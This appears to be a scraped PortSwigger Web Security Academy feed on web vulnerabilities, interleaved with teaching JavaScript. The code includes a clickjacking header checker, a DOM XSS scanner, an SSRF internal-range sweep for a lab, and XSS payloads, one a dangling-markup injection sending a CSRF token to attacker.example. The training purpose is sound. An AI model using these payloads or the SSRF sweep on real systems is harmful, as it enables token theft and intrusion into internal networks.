
Web Security Academy
@WebSecAcademy
Free web security training from @PortSwigger
Can’t trigger full XSS? You might still exfiltrate data. Dangling markup injection is the XSS fallback technique attackers rely on. What is Dangling Markup Injection? Dangling markup injection happens when attacker-controlled input is placed into HTML without proper encoding,…

It's such a joy watching @_JohnHammond discover Burp AI's "explore issue" feature for the first time! Check it out.
Clickjacking leaves users exposed to hidden UI actions. Frame-busting scripts often fail, leaving sites vulnerable to overlay tricks. Here's how to defend against it👇 X-Frame-Options was first introduced in IE8 and later adopted by other browsers. It lets site owners control…
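Added example (my code, not PortSwigger's): a function that decides whether a response may be framed by a given embedding page, using the two mechanisms the post is about, `X-Frame-Options` and the CSP `frame-ancestors` directive. It assumes response headers arrive as an object keyed by lower-case name, and it considers only the top-level embedder (real browsers check every ancestor frame).

```javascript
// Added example (not PortSwigger's code): may `responseUrl` be framed by a page
// at `embedderUrl`, given its response headers? Headers are assumed to be an
// object keyed by lower-case name; only the top-level embedder is considered.

function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

// Does one frame-ancestors source expression match the embedding origin?
// Simplification: host sources are compared by hostname, ignoring ports.
function sourceMatches(source, embedderOrigin, responseOrigin) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return embedderOrigin === responseOrigin;
  if (s === "*") return true;
  const e = new URL(embedderOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return e.protocol === s; // scheme source, e.g. https:
  let host = s;
  const m = s.match(/^([a-z][a-z0-9+.-]*):\/\/(.+)$/);
  if (m) {
    if (e.protocol !== m[1] + ":") return false;
    host = m[2];
  }
  if (host.startsWith("*.")) return e.hostname.endsWith(host.slice(1));
  return e.hostname === host;
}

function canBeFramed(headers, responseUrl, embedderUrl) {
  const responseOrigin = originOf(responseUrl);
  const embedderOrigin = originOf(embedderUrl);

  // CSP frame-ancestors is authoritative: when it is present, browsers ignore
  // X-Frame-Options entirely, so it is checked first.
  const csp = headers["content-security-policy"] || "";
  const directive = csp.split(";").map(d => d.trim())
    .find(d => /^frame-ancestors(\s|$)/i.test(d));
  if (directive) {
    const sources = directive.split(/\s+/).slice(1);
    if (sources.length === 0) return false; // empty source list behaves like 'none'
    return sources.some(src => sourceMatches(src, embedderOrigin, responseOrigin));
  }

  const xfo = (headers["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return embedderOrigin === responseOrigin;
  // ALLOW-FROM is obsolete and ignored by current browsers, and a missing or
  // unrecognised value imposes no restriction: the page can be framed anywhere.
  return true;
}

// Constructed sample: a banking page and an attacker's overlay page.
const bank = "https://bank.example/transfer";
const deny = { "x-frame-options": "DENY" };
const cspOnly = { "content-security-policy": "default-src 'self'; frame-ancestors 'self' https://*.partner.example" };
console.log(canBeFramed(deny, bank, "https://evil.example/"));            // false
console.log(canBeFramed({}, bank, "https://evil.example/"));              // true: no header at all
console.log(canBeFramed(cspOnly, bank, "https://app.partner.example/"));  // true
```

The practical takeaway the evaluator encodes: a missing header means framing is allowed, `frame-ancestors` wins over `X-Frame-Options` when both are sent, and `SAMEORIGIN` is only as good as the origin comparison, so a CSP policy is the setting to get right.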

DOM-based XSS happens entirely in the browser - no server required. It’s subtle, client-side, and often missed by traditional scanners. What is DOM XSS? DOM-based XSS occurs when JavaScript reads data from a user-controllable source (like the URL) and passes it into a…
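Added example (my code, not a PortSwigger scanner): a minimal source-to-sink check for DOM XSS of the kind the post describes. It walks a constructed JavaScript snippet line by line, marks variables assigned from attacker-controllable sources such as `location.search` as tainted, and reports the lines where tainted data reaches a sink such as `innerHTML` or `document.write`. The source and sink lists are deliberately short and the snippet is made up for the example.

```javascript
// Added example (not PortSwigger's code): a tiny taint tracker for DOM XSS.
// Sources are places an attacker controls; sinks interpret a string as markup
// or code. Both lists are illustrative, not exhaustive.

const SOURCES = [
  /\blocation\.(search|hash|href|pathname)\b/,
  /\bdocument\.(URL|documentURI|referrer|cookie)\b/,
  /\bwindow\.name\b/,
];

const SINKS = [
  /\.(innerHTML|outerHTML)\s*=(?!=)/,
  /\.insertAdjacentHTML\s*\(/,
  /\bdocument\.write(ln)?\s*\(/,
  /\beval\s*\(/,
];

// Is this expression attacker-influenced, directly or via a tainted variable?
function isDirty(expr, tainted) {
  if (SOURCES.some(r => r.test(expr))) return true;
  for (const v of tainted) {
    if (new RegExp("\\b" + v + "\\b").test(expr)) return true;
  }
  return false;
}

function scanForDomXss(code) {
  const tainted = new Set();
  const findings = [];
  code.split("\n").forEach((raw, idx) => {
    const line = raw.trim();
    if (!line || line.startsWith("//")) return;

    // 1. Sinks: only the expression fed into the sink matters, so the check
    //    starts after the sink match (the right-hand side or the argument list).
    for (const sink of SINKS) {
      const m = line.match(sink);
      if (!m) continue;
      const fed = line.slice(m.index + m[0].length);
      if (isDirty(fed, tainted)) findings.push({ line: idx + 1, sink: m[0].trim(), code: line });
      break;
    }

    // 2. Propagation: `const x = <dirty expression>` makes x tainted too.
    const decl = line.match(/^(?:(?:const|let|var)\s+)?([A-Za-z_]\w*)\s*=(?!=)\s*(.+)$/);
    if (decl && isDirty(decl[2], tainted)) tainted.add(decl[1]);
  });
  return findings;
}

// Constructed sample page script: two real DOM XSS sinks, one safe textContent use.
const SAMPLE = `
// search results page (constructed sample)
const params = new URLSearchParams(location.search);
const query = params.get("q");
const heading = "Results for: " + query;
document.getElementById("title").innerHTML = heading;
document.getElementById("count").innerHTML = "0 results";
const el = document.getElementById("safe");
el.textContent = heading;
document.write("<p>" + location.hash + "</p>");
`;

function demoFindings() {
  return scanForDomXss(SAMPLE).map(f => f.line); // [6, 10]
}

console.log(scanForDomXss(SAMPLE));
```

The tracker follows data only through straight-line assignments; it knows nothing about sanitizer calls, function boundaries or DOM lookups, so it will over-report a variable like `el` if the element id itself came from the URL. That blind spot is the same reason server-side scanners miss DOM XSS: the flow only exists in the browser.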

Learning path: GraphQL API vulnerabilities This learning path explores common vulnerabilities associated with GraphQL APIs. It covers how these vulnerabilities arise from implementation and design flaws, and how to bypass and exploit them. You’ll learn how to: 🔶 Discover API…

Security research doesn’t have to be lonely. Come meet others who think like you. 👉 discord.gg/portswigger 👈

APPRENTICE LAB: Basic SSRF against another back-end system Use the stock check feature to scan the internal 192.168.0.X range for an admin interface on port 8080, then delete user carlos. What you’ll learn 🔸 How SSRF can be used to reach internal-only services 🔸 How to use…
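Added example (my code, not the lab's own): the sweep the lab asks for, driving the stock-check feature across 192.168.0.0-255 on port 8080 and picking out the host that answers differently from the rest. The request function is injected so the sweep runs offline here against a constructed fake back end; the parameter name `stockApi`, the `/admin` path and the fake's responses are assumptions, not details taken from this page.

```javascript
// Added example (not PortSwigger's lab code): use the stock-check feature as an
// SSRF proxy to scan an internal range. `sendStockCheck(body)` is injected and
// must return { status, body }; the parameter name and path are assumptions.

function buildStockCheckBody(targetUrl) {
  return "stockApi=" + encodeURIComponent(targetUrl);
}

function scanInternalRange(sendStockCheck, { port = 8080, path = "/admin" } = {}) {
  const results = [];
  for (let host = 0; host <= 255; host++) {
    const target = `http://192.168.0.${host}:${port}${path}`;
    const res = sendStockCheck(buildStockCheckBody(target));
    results.push({ target, status: res.status, length: res.body.length });
  }
  // Nearly every address yields the back end's connection error, so the most
  // common (status, length) pair is the baseline and the outliers are the hits,
  // which is what sorting an Intruder attack by status or length shows by eye.
  const key = r => `${r.status}:${r.length}`;
  const counts = new Map();
  for (const r of results) counts.set(key(r), (counts.get(key(r)) || 0) + 1);
  const baseline = [...counts.entries()].sort((a, b) => b[1] - a[1])[0][0];
  return results.filter(r => key(r) !== baseline);
}

// Constructed stand-in for the lab's back end so the example runs offline:
// one internal host serves an admin page, everything else fails to connect.
function fakeStockCheck(body) {
  const target = decodeURIComponent(body.split("=")[1]);
  if (target === "http://192.168.0.68:8080/admin") {
    return { status: 200, body: "<h1>Admin interface</h1><p>(constructed sample page)</p>" };
  }
  return { status: 500, body: "Could not connect to external stock check service" };
}

function demoHits() {
  return scanInternalRange(fakeStockCheck); // one hit: http://192.168.0.68:8080/admin
}

console.log(demoHits());
```

Against the live lab, `fakeStockCheck` is replaced by a function that POSTs the body to the product's stock-check endpoint and returns the status and body. Baselining on the most common response rather than hard-coding "200 means found" is what keeps the scan honest when the back end returns 200 with an error page for unreachable hosts. The follow-up request that deletes the user reuses the same parameter pointed at the URL the admin page exposes; that URL is not on this page, so it is left out here.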
Learning path: NoSQL injection This learning path covers the detection, exploitation, and prevention of NoSQL injection vulnerabilities. You’ll learn: 🔶 The core principles behind NoSQL injection and the different types of attacks. 🔶 How to perform both syntax and operator…

Stored cross-site scripting (XSS) is more dangerous than most people realize. It doesn’t rely on a user clicking a link - it waits silently in the app. What is Stored XSS? Stored XSS (also known as persistent or second-order XSS) happens when user-supplied input is saved by…

APPRENTICE LAB: Exploiting an API endpoint using documentation Can you find the exposed API documentation and delete Carlos? What you’ll learn 🔸 How exposed API docs can reveal endpoints 🔸 How to discover and interact with API docs in-situ 🔸 How to use Burp to enumerate and…
The Ultimate XSS Cheat Sheet! This XSS cheat-sheet lists vectors (filterable by event, tag, or browser) that can bypass WAFs and filters! Each entry even includes a proof-of-concept. Bookmark this 👉 portswigger.net/web-security/c…

Learning path: Path traversal This learning path covers path traversal vulnerabilities, teaching you how to perform attacks, circumvent common obstacles, and prevent them in your applications. You’ll learn: 🔶 What path traversal is and how it can be used to read arbitrary…

APPRENTICE LAB: Basic clickjacking with CSRF token protection. Clickjacking tricks users into clicking something they don’t see, often within a transparent iframe. Even with CSRF tokens in place, user interaction can still be weaponized, and that’s exactly what this lab teaches.…
[APPRENTICE LAB] Reflected XSS into attribute with angle brackets HTML-encoded This interactive lab teaches how to exploit reflected XSS by escaping HTML attributes and using event handlers. What you'll learn: ✅ Why encoding angle brackets is not sufficient ✅ How to inject…
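Added example (my code, not PortSwigger's) serving two of the posts above: the dangling markup injection post and this reflected-XSS-into-attribute lab. The same reflected search term is rendered under three output-encoding choices and then read back with a small attribute tokenizer that mimics how a browser would parse the result, so you can see an unencoded `<` turn into an exfiltrating `<img src='...` that swallows the CSRF token, and an unencoded `"` turn into an `onfocus` handler even when angle brackets are encoded. The template, the CSRF token and the attacker host are constructed for the example.

```javascript
// Added example (not PortSwigger's code): attribute-context injection under
// three encoders. Template, token and attacker host are constructed.

const CSRF_TOKEN = "t0k3n-constructed";

// Vulnerable template: the search term is reflected inside a value attribute,
// and a CSRF token sits in the markup that follows it.
function renderSearch(term, encode) {
  return `<input type="text" name="search" value="${encode(term)}">` +
    `<input type="hidden" name="csrf" value="${CSRF_TOKEN}">` +
    `<button type="submit">Search</button>`;
}

const encodeNothing = s => s;
// Angle brackets only: stops new tags, not attribute breakout.
const encodeAngles = s => s.replace(/</g, "&lt;").replace(/>/g, "&gt;");
// Full attribute encoding: ampersand and both quote characters as well.
const encodeAttr = s => s.replace(/&/g, "&amp;").replace(/"/g, "&quot;")
  .replace(/'/g, "&#x27;").replace(/</g, "&lt;").replace(/>/g, "&gt;");

// Minimal tag/attribute tokenizer. An unterminated quoted value runs to the end
// of the document, which is exactly what dangling markup injection relies on.
function parseTags(html) {
  const tags = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== "<") { i++; continue; }
    let j = i + 1, name = "";
    while (j < html.length && /[A-Za-z0-9]/.test(html[j])) name += html[j++];
    if (!name) { i++; continue; }
    const attrs = {};
    while (j < html.length && html[j] !== ">") {
      while (j < html.length && /[\s\/]/.test(html[j])) j++;
      if (j >= html.length || html[j] === ">") break;
      let attrName = "", value = "";
      while (j < html.length && !/[\s=>\/]/.test(html[j])) attrName += html[j++];
      while (j < html.length && /\s/.test(html[j])) j++;
      if (html[j] === "=") {
        j++;
        while (j < html.length && /\s/.test(html[j])) j++;
        const q = html[j];
        if (q === '"' || q === "'") {
          const end = html.indexOf(q, j + 1);
          value = end === -1 ? html.slice(j + 1) : html.slice(j + 1, end);
          j = end === -1 ? html.length : end + 1;
        } else {
          while (j < html.length && !/[\s>]/.test(html[j])) value += html[j++];
        }
      }
      if (attrName) attrs[attrName.toLowerCase()] = value;
    }
    tags.push({ name: name.toLowerCase(), attrs });
    i = j + 1;
  }
  return tags;
}

// What the attacker gets: URL-bearing attributes that swallowed the CSRF token
// (dangling markup) and any event-handler attribute that was injected.
function analyse(html) {
  const leaks = [], handlers = [];
  for (const t of parseTags(html)) {
    for (const [k, v] of Object.entries(t.attrs)) {
      if (["src", "href", "action"].includes(k) && v.includes(CSRF_TOKEN)) leaks.push(`${t.name}[${k}]`);
      if (k.startsWith("on")) handlers.push(`${t.name}[${k}]=${v}`);
    }
  }
  return { leaks, handlers };
}

const DANGLING = `"><img src='//attacker.example/?`;   // needs < left unencoded
const BREAKOUT = `" autofocus onfocus=alert(1) x="`;  // needs only " left unencoded

function demo() {
  return {
    rawDangling: analyse(renderSearch(DANGLING, encodeNothing)),   // leaks: ["img[src]"]
    anglesBreakout: analyse(renderSearch(BREAKOUT, encodeAngles)), // handlers: ["input[onfocus]=alert(1)"]
    attrDangling: analyse(renderSearch(DANGLING, encodeAttr)),     // nothing
    attrBreakout: analyse(renderSearch(BREAKOUT, encodeAttr)),     // nothing
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Two things worth noticing in the output: the leaked `src` value carries everything after the injection point up to the end of the document, token included, because no closing `'` ever appears; and the `onfocus` payload never used `<` or `>` at all, so encoding only those characters is not a defence in attribute context. Encoding for the context the value lands in (`&quot;` and `&#x27;` inside attributes) closes both off.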